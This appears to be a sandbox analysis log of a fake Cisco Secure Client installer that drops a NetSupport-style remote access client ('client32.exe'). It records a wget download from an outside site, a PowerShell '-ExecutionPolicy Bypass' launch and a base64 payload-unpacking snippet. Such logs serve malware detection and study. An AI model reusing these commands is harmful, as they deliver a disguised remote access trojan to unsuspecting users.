Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Users\user\Desktop\download\CiscoSetup.exe | File created: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp
Source: C:\Users\user\Desktop\download\CiscoSetup.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp | File read: C:\Program Files (x86)\desktop.ini
Source: C:\Windows\SysWOW64\wget.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "https://asknetsupertech.com/wp-content/plugins/elementor/app/modules/site-editor/CiscoSetup.exe"
Source: unknown | Process created: C:\Users\user\Desktop\download\CiscoSetup.exe "C:\Users\user\Desktop\download\CiscoSetup.exe"
Source: C:\Users\user\Desktop\download\CiscoSetup.exe | Process created: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp "C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp" /SL5="$50272,13456411,1058304,C:\Users\user\Desktop\download\CiscoSetup.exe"
Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-577AP.tmp\cispn.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\Cisco\client32.exe "C:\Users\user\AppData\Roaming\Cisco\client32.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wget.exe | Section loaded: edgegdi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msasn1.dll, mswsock.dll, dnsapi.dll, iphlpapi.dll, rasadhlp.dll, fwpuclnt.dll, kernel.appcore.dll, uxtheme.dll, explorerframe.dll
Source: C:\Users\user\Desktop\download\CiscoSetup.exe | Section loaded: edgegdi.dll, uxtheme.dll, apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp | Section loaded: mpr.dll, version.dll, winhttp.dll, edgegdi.dll, uxtheme.dll, kernel.appcore.dll, wtsapi32.dll, winsta.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, textshaping.dll, dwmapi.dll, shfolder.dll, windows.storage.dll, wldp.dll, sspicli.dll, explorerframe.dll, sfc.dll, sfc_os.dll, propsys.dll, profapi.dll, linkinfo.dll, ntshrui.dll, srvcli.dll, cscapi.dll, edputil.dll, urlmon.dll, iertutil.dll, netutils.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, edgegdi.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, urlmon.dll, xmllite.dll, iertutil.dll, srvcli.dll, netutils.dll, secur32.dll, sspicli.dll, uxtheme.dll, propsys.dll, wininet.dll, kdscli.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe | Section loaded: apphelp.dll, pcicl32.dll, shfolder.dll, pcichek.dll, pcicapi.dll, mpr.dll, version.dll, winmm.dll, wsock32.dll, msvcr100.dll, netapi32.dll, wininet.dll, netutils.dll, samcli.dll, edgegdi.dll, dbghelp.dll, dbgcore.dll, wtsapi32.dll, uxtheme.dll, nsmtrace.dll, nslsp.dll, devobj.dll, msasn1.dll, pcihooks.dll, kernel.appcore.dll, wbemcomn.dll, textshaping.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll, riched32.dll, riched20.dll, usp10.dll, msls31.dll, windows.storage.dll, wldp.dll, pciinv.dll, iertutil.dll, sspicli.dll, firewallapi.dll, dnsapi.dll, iphlpapi.dll, fwbase.dll, fwpolicyiomgr.dll, napinsp.dll, ondemandconnroutehelper.dll, winhttp.dll, pnrpnsp.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wshbth.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: nlaapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winrnr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: dhcpcsvc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicl32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: shfolder.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcichek.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: pcicapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wsock32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: msvcr100.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: netapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: netutils.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: samcli.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: edgegdi.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: wtsapi32.dll
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Section loaded: uxtheme.dll
                                  Source: C:\Windows\SysWOW64\wget.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32
                                  Source: Cisco Secure Client for Windows.lnk.6.dr LNK file: ..\..\..\..\..\..\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui.exe
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Roaming\Cisco\nsm_vpro.ini
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp Window found: window name: TSelectLanguageForm
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp Automated click: OK
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp Automated click: Install
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp Automated click: Next
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll
                                  Source: Window Recorder Window detected: More than 3 window changes detected
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Cisco\msvcr100.dll
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: client32.exe, 0000000B.00000002.70085959450.0000000068CB2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000C.00000002.69251363793.0000000068CB2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe, 0000000D.00000002.69332147319.0000000068CB2000.00000002.00000001.01000000.0000000D.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000C.00000002.69250097994.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.69330672852.000000001118F000.00000002.00000001.01000000.0000000B.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.69181004956.000000000A0AB000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: client32.pdb\1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\kdf\api\layer4\winxp\Win32\Release\ac_sock_fltr_api.pdb% source: is-8FFCG.tmp.6.dr
                                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.69174549429.0000000007B12000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\Agent\Win32\Release\vpnagent.pdb source: is-J44M9.tmp.6.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdbP` source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\Agent\Win32\Release\vpnagent.pdbaa\GCTL source: is-J44M9.tmp.6.dr
                                  Source: Binary string: \1141\1141\client32\Release\client32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdb source: is-C05BP.tmp.6.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\vpn\Downloader\Win32\Release\vpndownloader.pdb source: is-4ES8I.tmp.6.dr
                                  Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 0000000C.00000002.69251018247.0000000068BF1000.00000020.00000001.01000000.0000000E.sdmp, client32.exe, 0000000D.00000002.69331721534.0000000068BF1000.00000020.00000001.01000000.0000000E.sdmp
                                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.69180702830.0000000009FC0000.00000004.00000020.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1280\1280f\ctl32\release_unicode\tcctl32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: compiler: cl /Zi /Fdcrypto\buildinf.pdb /MT /Zl /Gs0 /GF /Gy /W3 /Zf /wd4090 /nologo /O2 /guard:cf -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM -DOPENSSL_USE_BUILD_DATE -DOPENSSL_NO_HEARTBEATS -D_CRT_SECURE_NO_WARNINGS -DNDEBUG /I C:/Users/build/p4files/ngc/Quicksilver/published/openssl/include source: is-4ES8I.tmp.6.dr
                                  Source: Binary string: client32.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 00000008.00000002.69141328382.000000000578A000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.8.dr
                                  Source: Binary string: C:\temp\build\thehoff\Quicksilver_MR50.560024709388\Quicksilver_MR5\kdf\api\layer4\winxp\Win32\Release\ac_sock_fltr_api.pdb source: is-8FFCG.tmp.6.dr
                                  Source: Binary string: C:\Users\build\p4files\ngc\Quicksilver\third-party\openssl\out.win.7.x86\ciscossl-1.1.1t.7.2.500\acciscossl.pdbAAA source: is-C05BP.tmp.6.dr
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 00000008.00000002.69141328382.0000000005887000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmp
                                  Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 0000000B.00000002.70086113734.0000000068CC5000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000C.00000002.69251545748.0000000068CC5000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 0000000D.00000002.69332386538.0000000068CC5000.00000002.00000001.01000000.0000000C.sdmp
                                  Source: Binary string: crypto\pem\pem_pkey.cRSA PRIVATE KEYDSA PRIVATE KEYEC PRIVATE KEYcompiler: cl /Zi /Fdcrypto\buildinf.pdb /MT /Zl /Gs0 /GF /Gy /W3 /Zf /wd4090 /nologo /O2 /guard:cf -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM -DOPENSSL_USE_BUILD_DATE -DOPENSSL_NO_HEARTBEATS -D_CRT_SECURE_NO_WARNINGS -DNDEBUG /I C:/Users/build/p4files/ngc/Quicksilver/published/openssl/includecrypto\asn1\x_info.ccrypto\pem\pem_info.ccrypto\ocsp\ocsp_lib.c source: is-4ES8I.tmp.6.dr

                                  Data Obfuscation

                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($base64Content);[System.IO.File]::WriteAllBytes($zipFileName, $decodedBytes);New-Item -ItemType Directory -Path $destinationPath;Expand-Archive -Path $zipFileName -DestinationPath $de
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_11029230 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,GetProcAddress,GetLastError,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary, 11_2_11029230
                                  Source: CiscoSetup.exe.2.dr Static PE information: section name: .didata
                                  Source: CiscoSetup.tmp.5.dr Static PE information: section name: .didata
                                  Source: is-HMVS5.tmp.6.dr Static PE information: section name: .didata
                                  Source: is-UHIQE.tmp.6.dr Static PE information: section name: fipstx
                                  Source: is-UHIQE.tmp.6.dr Static PE information: section name: fipsro
                                  Source: is-UHIQE.tmp.6.dr Static PE information: section name: fipsda
                                  Source: is-UHIQE.tmp.6.dr Static PE information: section name: fsig
                                  Source: is-UHIQE.tmp.6.dr Static PE information: section name: fipsrd
                                  Source: is-KBBQU.tmp.6.dr Static PE information: section name: _RDATA
                                  Source: is-AC64O.tmp.6.dr Static PE information: section name: _RDATA
                                  Source: is-GT7EB.tmp.6.dr Static PE information: section name: .orpc
                                  Source: is-DLGKK.tmp.6.dr Static PE information: section name: .00cfg
                                  Source: is-DLGKK.tmp.6.dr Static PE information: section name: .voltbl
                                  Source: PCICL32.DLL.8.dr Static PE information: section name: .hhshare
                                  Source: C:\Windows\SysWOW64\wget.exe Code function: 2_3_02DEB6F0 pushfd ; retn 0000h 2_3_02DEB71B
                                  Source: C:\Windows\SysWOW64\wget.exe Code function: 2_3_02DF38E0 pushad ; ret 2_3_02DF38E3
                                  Source: C:\Windows\SysWOW64\wget.exe Code function: 2_3_02DEB511 pushad ; retn 0078h 2_3_02DEB6ED
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_04F436E7 push ebx; iretd 8_2_04F436EA
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_1116B825 push ecx; ret 11_2_1116B838
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_11166719 push ecx; ret 11_2_1116672C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 11_2_689E6BBF push ecx; ret 11_2_689E6BD2
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_1116B825 push ecx; ret 12_2_1116B838
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_11166719 push ecx; ret 12_2_1116672C
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C00995 push ecx; ret 12_2_68C009A8
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C0C904 push edx; retf 0068h 12_2_68C0C90E
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68BF2D80 push eax; ret 12_2_68BF2D9E
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C1A6AA push EF3FEFD4h; iretd 12_2_68C1A6B1
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C0C7D0 push ebx; retf 0068h 12_2_68C0C7D2
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C19CD8 pushad ; iretd 12_2_68C19CE6
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C0BF60 push ecx; ret 12_2_68C0BF73
                                  Source: C:\Users\user\AppData\Roaming\Cisco\client32.exe Code function: 12_2_68C050BB push EF706683h; ret 12_2_68C050C0
                                  Source: is-BKRIV.tmp.6.dr Static PE information: section name: .text entropy: 6.8383653762559575
                                  Source: msvcr100.dll.8.dr Static PE information: section name: .text entropy: 6.909044922675825
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\ProxyCon.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KBBQU.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3VLKE.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\5.0.00923\csc_ui_toast.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-RH114.tmp
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Cisco\pcicapi.dll
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\Plugins\acdownloader.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnipsec.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1MCPC.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-E5LH8.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140_2.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\Setup\csc_ui_setup.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-BKRIV.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-Q3KOA.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\csc_ui_toast.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-R0O6I.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3E159.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnapishim.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.sys (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-IQ59L.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-AC64O.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_system.dll (copy)
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpnmgmttun.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\msvcp140.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-IGGJL.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-KEI9E.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-MTMR6.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\vpncli.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\is-4ES8I.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\cfom.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\unins000.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\zlib1.dll (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper.exe (copy)
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\UI\is-8PPEF.tmp
                                  Source: C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp File created: C:\Program Files (x86)\Cisco\Cisco Secure Client\InstallHelper64.exe (copy)
